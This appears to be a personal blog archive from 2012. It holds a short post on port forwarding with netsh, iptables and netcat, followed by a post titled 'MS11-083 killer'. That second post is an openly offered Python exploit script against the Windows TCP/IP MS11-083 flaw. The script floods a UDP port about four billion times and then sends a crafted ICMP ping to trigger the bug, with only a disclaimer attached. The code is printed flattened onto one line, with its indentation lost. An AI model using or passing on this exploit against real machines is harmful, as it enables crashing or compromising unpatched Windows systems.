______ Y ______
My own personal time capsule.
Category Archives: ms
Port forwarding on Windows
August 22, 2012
Posted by on Sometimes almost a magical task but turns out that there is a way to easily forward the ports on windows by executing this command:
> netsh > interface portproxy add v4tov4 listenport=445 listenaddress=192.168.0.1 connectport=445 connectaddress=192.168.0.2
This will forward port 445 from 192.168.0.1 to 192.168.0.2 on windows.
As per Linux:
> iptables -A PREROUTING -t nat -i eth1 -p tcp --source 192.168.0.5 --dport 8080 -j DNAT --to 192.168.0.2:8080
If neither is accessible, then netcat can be used to send content of the stream to specific port:
nc -L -p 6555 | nc 192.168.0.2:8080
MS11-083 killer
January 26, 2012
Posted by on Following code will attempt to exploit the MS11-083 by sending specially crafted packets to closed UDP port ( read more here).
import socket import threading try: from dpkt.ip import IP from dpkt.icmp import ICMP except: print "install dpkt if you want this program to run!" print "[+] MS11-083 killer by Y" print "[+] contact : If you know me then give me a shout" ############ EDIT THIS ################# UDP_IP="192.168.93.15" UDP_PORT=839 MESSAGE="\x44\x44\x44\x44\x44\x44\x44\x44\x44\x00\x00\x00\x00\x00\x00" ThreadCount = 32 ######################################## print " [+]UDP target IP:", UDP_IP print " [+]UDP target port:", UDP_PORT print " [+]UDP payload lenght:", len(MESSAGE) def customPing(UDP_IP,repeat): # craft custom ping dataCC = "\xCC\xCC\xCC\xCC\xCC\xCC" ip = IP(src='\x01\x02\x03\x04', dst=UDP_IP, p=1) icmp = ICMP(type=8, data=ICMP.Echo(id=123, seq=1, data=dataCC)) ip.data = icmp ip.len += len(ip.data) print "[+] Building socket for final ping" s = socket.socket(socket.AF_INET, socket.SOCK_RAW) s.connect((UDP_IP, 1)) # sending packet print "[+] Sending final ping ( debug trap ) " for x in range(10): s.send(str(ip)) try: print "\t[+] Running UDP attack against -> ", UDP_IP , "on port " , UDP_PORT s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) s.setblocking(0) # set non-blocking mode class ThreadClass(threading.Thread): def run(self): c = 0 while c<(4294967296/ThreadCount): # 2^32 requests to overflow the counter s.sendto( MESSAGE, (UDP_IP,UDP_PORT )) # trigger the actual attack via ICMP messages ( the payload can probably trigger command execution !?) print "[+] Triggering actual attack " customPing(UDP_IP,20) for i in range(ThreadCount): t = ThreadClass() t.start() print "[+] Thread ",i," is starting and its name is : " , t.getName() except Exception,e: print " [-] Exception occured, reason : " , e
Note that this code is only for the educational purposes and I do not take the responsibility for any missuses.